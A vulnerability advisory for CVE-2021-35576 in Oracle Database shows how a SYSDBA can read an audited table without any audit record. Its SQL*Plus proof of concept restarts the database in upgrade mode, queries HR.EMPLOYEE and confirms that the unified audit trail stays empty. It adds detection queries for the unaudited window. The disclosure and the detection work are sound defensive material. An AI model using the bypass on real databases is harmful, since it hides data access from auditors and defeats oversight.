Title: CVE-2021-35576 – Oracle Database Unified Audit Policy Bypass
Product: Database
Manufacturer: Oracle
Affected Version(s): 12.1.0.2, 12.2.0.1, 19c
Tested Version(s): 19c
Risk Level: low
Solution Status: Fixed
Manufacturer Notification: 2021-03-17
Solution Date: 2021-10-17
Public Disclosure: 2022-06-11
CVE Reference: CVE-2021-35576
Author of Advisory: Emad Al-Mousa
Overview:
Oracle Database is a general purpose relational database management system (RDBMS).
Unified Auditing is the supported mechanism for capturing database audit logs. The unified audit trail collects audit information from a variety of sources. It resides in a read-only table in the AUDSYS schema in the SYSAUX tablespace, exposes this information in a uniform format through the UNIFIED_AUDIT_TRAIL data dictionary view, and is available in both single-instance and Oracle Real Application Clusters environments. In addition to the user SYS, users who have been granted the AUDIT_ADMIN or AUDIT_VIEWER role can query this view. If users only need to query the view and not create audit policies, grant them the AUDIT_VIEWER role.
*****************************************
Vulnerability Details:
The vulnerability allows a database administrator, or a system administrator with access to the database server (via local login or remote authentication), to bypass a custom audit policy defined in the Oracle database. Placing the database in upgrade mode disables unified auditing, so a threat actor with SYSDBA privileges can perform operations against audited objects without any record being written to the audit trail.
*****************************************
Proof of Concept (PoC):
I will create a table in the pluggable database PDB1 under the HR schema and insert a few records:
SQL> CREATE TABLE HR.EMPLOYEE
(
FIRST_NAME VARCHAR2(50),
LAST_NAME VARCHAR2(50)
);
SQL> INSERT INTO HR.EMPLOYEE (
FIRST_NAME, LAST_NAME)
VALUES ( 'EMAD','MOUSA' );
SQL> commit;
SQL> INSERT INTO HR.EMPLOYEE (
FIRST_NAME, LAST_NAME)
VALUES ( 'SAMI','MOUSA' );
SQL> commit;
I will now create an audit policy that records every SELECT against the table, and enable it:
SQL> CREATE AUDIT POLICY SELECT_P1 ACTIONS SELECT ON HR.EMPLOYEE;
SQL> AUDIT POLICY SELECT_P1;
To check the audit policies enabled in PDB1:
SQL> SELECT * FROM audit_unified_enabled_policies;
Now, let us execute the SELECT statement against the monitored/audited table while the database is in upgrade mode:
sqlplus / as sysdba
SQL> alter session set container=PDB1;
SQL> shutdown immediate;
SQL> startup upgrade;
SQL> select * from HR.EMPLOYEE;
SQL> startup force;
SQL> exec SYS.DBMS_AUDIT_MGMT.FLUSH_UNIFIED_AUDIT_TRAIL;
Checking the audit trail with the query below, no entry for the SELECT is found in the unified audit trail:
SQL> select OS_USERNAME,USERHOST,DBUSERNAME,CLIENT_PROGRAM_NAME,EVENT_TIMESTAMP,ACTION_NAME,OBJECT_SCHEMA,OBJECT_NAME,SQL_TEXT from unified_audit_trail where OBJECT_NAME='EMPLOYEE' order by EVENT_TIMESTAMP desc;
So, even though an audit policy was configured and enabled in the database, a DBA/system administrator can read the audited sensitive table without leaving a trace: no record is populated in the UNIFIED_AUDIT_TRAIL view.
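The following compensating checks are an added example and are not part of the original advisory or of Oracle's own tooling. They assume the PoC setup above (policy SELECT_P1 on HR.EMPLOYEE in PDB1), a session connected to PDB1 as a user who can read V$PDBS, V$DIAG_ALERT_EXT and UNIFIED_AUDIT_TRAIL (e.g. AUDIT_VIEWER plus SELECT ANY DICTIONARY), and that the alert log wording matched by the LIKE patterns is only a starting point, since the exact text varies by version.

```sql
-- Added example (not from the advisory): detect the conditions the PoC relies on.

-- 1. Is the PDB open in upgrade mode right now? A container opened with
--    STARTUP UPGRADE reports OPEN_MODE = 'MIGRATE' in V$PDBS.
SELECT con_id, name, open_mode
FROM   v$pdbs
WHERE  open_mode = 'MIGRATE';

-- 2. Confirm the policy is still enabled. Disabling it with NOAUDIT would be
--    mandatorily audited; the upgrade-mode read in the PoC is not.
SELECT policy_name, enabled_option, entity_name, success, failure
FROM   audit_unified_enabled_policies
WHERE  policy_name = 'SELECT_P1';

-- 3. Build one timeline from instance restarts (alert log) and audited reads of
--    the table (unified audit trail). A restart into upgrade mode followed by a
--    further restart with no AUDIT rows in between is the window the PoC
--    exploits: treat it as an unaudited period, not as "no access happened".
--    Both timestamps are cast to plain TIMESTAMP so UNION ALL accepts them.
SELECT 'ALERT' AS src,
       CAST(originating_timestamp AS TIMESTAMP) AS ts,
       message_text AS detail
FROM   v$diag_alert_ext
WHERE  originating_timestamp > SYSTIMESTAMP - INTERVAL '7' DAY
AND   (   message_text LIKE 'Starting ORACLE instance%'
       OR LOWER(message_text) LIKE '%upgrade%')          -- assumed wording
UNION ALL
SELECT 'AUDIT' AS src,
       CAST(event_timestamp AS TIMESTAMP) AS ts,
       dbusername || ' ' || action_name || ' ' || object_schema || '.' || object_name AS detail
FROM   unified_audit_trail
WHERE  object_schema = 'HR'
AND    object_name   = 'EMPLOYEE'
AND    event_timestamp > SYSTIMESTAMP - INTERVAL '7' DAY
ORDER BY ts;
```

Query 1 only catches an attacker who is in upgrade mode at the moment it runs; queries 2 and 3 are the after-the-fact checks. Because the unified audit trail itself contains nothing for the upgrade-mode window, the restart events from the alert log are the only in-database evidence that such a window existed, and they should be corroborated with OS-level records of who started the SYSDBA session.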
*****************************************
References:
https://www.oracle.com/security-alerts/cpuoct2021.html
https://databasesecurityninja.wordpress.com/2022/06/11/cve-2021-35576-bypassing-unified-audit-policy/
https://nvd.nist.gov/vuln/detail/CVE-2021-35576
Credit:
Emad Al-Mousa: CVE-2021-35576